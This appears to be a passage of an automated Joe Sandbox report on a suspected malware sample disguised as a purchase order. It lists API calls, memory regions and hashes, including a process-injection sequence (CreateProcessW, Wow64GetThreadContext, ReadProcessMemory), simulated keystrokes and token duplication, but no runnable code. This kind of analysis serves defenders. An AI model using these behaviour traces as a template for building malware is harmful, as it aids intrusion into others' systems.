                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Message$DispatchTranslate
                                        • String ID:
                                        • API String ID: 1706434739-0
                                        • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                        • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                        • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                        • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 040F3D2D
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040F3D51
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040F3D73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1698112253.00000000040F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F2000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40f2000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                        • Instruction ID: 84243741975d4db7b758ebad47c49bc9038b1e4b8e9e1f6a6ef27a5285552786
                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                        • Instruction Fuzzy Hash: 0612EF20E24658C6EB24DF60D8507DEB272EF68300F1090E9910DEB7A5E77A5F81CF5A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                        • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                        • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                        • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ProcWindow
                                        • String ID:
                                        • API String ID: 181713994-0
                                        • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                        • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                        • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                        • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                        • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                        • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                        • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                        APIs
                                          • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                        • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: File$PointerWrite
                                        • String ID:
                                        • API String ID: 539440098-0
                                        • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                        • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                        • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                        • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ProcWindow
                                        • String ID:
                                        • API String ID: 181713994-0
                                        • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                        • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                        • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                        • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __wfsopen
                                        • String ID:
                                        • API String ID: 197181222-0
                                        • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                        • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                        • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                        • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                        APIs
                                        • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                        • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                        • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                        • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 040F4511
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1698112253.00000000040F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F2000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40f2000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction ID: 5210fc3e60e9c06d9238401787866fe187fc1c9584dda1b96b71514720222898
                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction Fuzzy Hash: CFE0E67494010DDFDB00EFF4D94969E7FB4EF04702F100561FD01E2281D6709E50CA62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                        • API String ID: 0-4260964411
                                        • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                        • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                        • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                        • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                        APIs
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                        • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                        • GetKeyState.USER32(00000011), ref: 0047C1A4
                                        • GetKeyState.USER32(00000009), ref: 0047C1AD
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                        • GetKeyState.USER32(00000010), ref: 0047C1CA
                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                        • SendMessageW.USER32 ref: 0047C2FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$State$LongProcWindow
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 1562745308-4164748364
                                        • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                        • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                        • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                        • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                        • IsIconic.USER32(?), ref: 004375E1
                                        • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                        • SetForegroundWindow.USER32(?), ref: 004375FD
                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                        • GetCurrentThreadId.KERNEL32 ref: 00437619
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                        • SetForegroundWindow.USER32(?), ref: 00437645
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                        • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                        • keybd_event.USER32(00000012,00000000), ref: 00437674
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                        • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                        • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                        • SetForegroundWindow.USER32(?), ref: 004376AD
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 3778422247-2988720461
                                        • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                        • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                        • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                        • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                        APIs
                                        • _memset.LIBCMT ref: 0044621B
                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                        • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                        • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                        • _wcslen.LIBCMT ref: 0044639E
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                        • _wcsncpy.LIBCMT ref: 004463C7
                                        • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                        • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                        • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                        • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                        • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                        • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                        • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                        • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                        • String ID: $default$winsta0
                                        • API String ID: 2173856841-1027155976
                                        • Opcode ID: 8783c105518f9fa52f5c80a6299cf7ec7b6e28c011eada52347f54b488ad9e21
                                        • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                        • Opcode Fuzzy Hash: 8783c105518f9fa52f5c80a6299cf7ec7b6e28c011eada52347f54b488ad9e21
                                        • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                        APIs
                                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z1PurchaseOrder.exe,?,C:\Users\user\Desktop\z1PurchaseOrder.exe,004A8E80,C:\Users\user\Desktop\z1PurchaseOrder.exe,0040F3D2), ref: 0040FFCA
                                          • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                          • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                          • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                          • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                        • _wcscat.LIBCMT ref: 0044BD96
                                        • _wcscat.LIBCMT ref: 0044BDBF
                                        • __wsplitpath.LIBCMT ref: 0044BDEC
                                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                        • _wcscpy.LIBCMT ref: 0044BE73
                                        • _wcscat.LIBCMT ref: 0044BE85
                                        • _wcscat.LIBCMT ref: 0044BE97
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                        • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                        • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                        • FindClose.KERNEL32(00000000), ref: 0044BF35
                                        • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                        • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 2188072990-1173974218
                                        • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                        • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                        • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                        • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                        APIs
                                        • __invoke_watson.LIBCMT ref: 004203A4
                                          • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                          • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                          • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                          • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                          • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                          • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                        • __get_daylight.LIBCMT ref: 004203B0
                                        • __invoke_watson.LIBCMT ref: 004203BF
                                        • __get_daylight.LIBCMT ref: 004203CB
                                        • __invoke_watson.LIBCMT ref: 004203DA
                                        • ____lc_codepage_func.LIBCMT ref: 004203E2
                                        • _strlen.LIBCMT ref: 00420442
                                        • __malloc_crt.LIBCMT ref: 00420449
                                        • _strlen.LIBCMT ref: 0042045F
                                        • _strcpy_s.LIBCMT ref: 0042046D
                                        • __invoke_watson.LIBCMT ref: 00420482
                                        • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
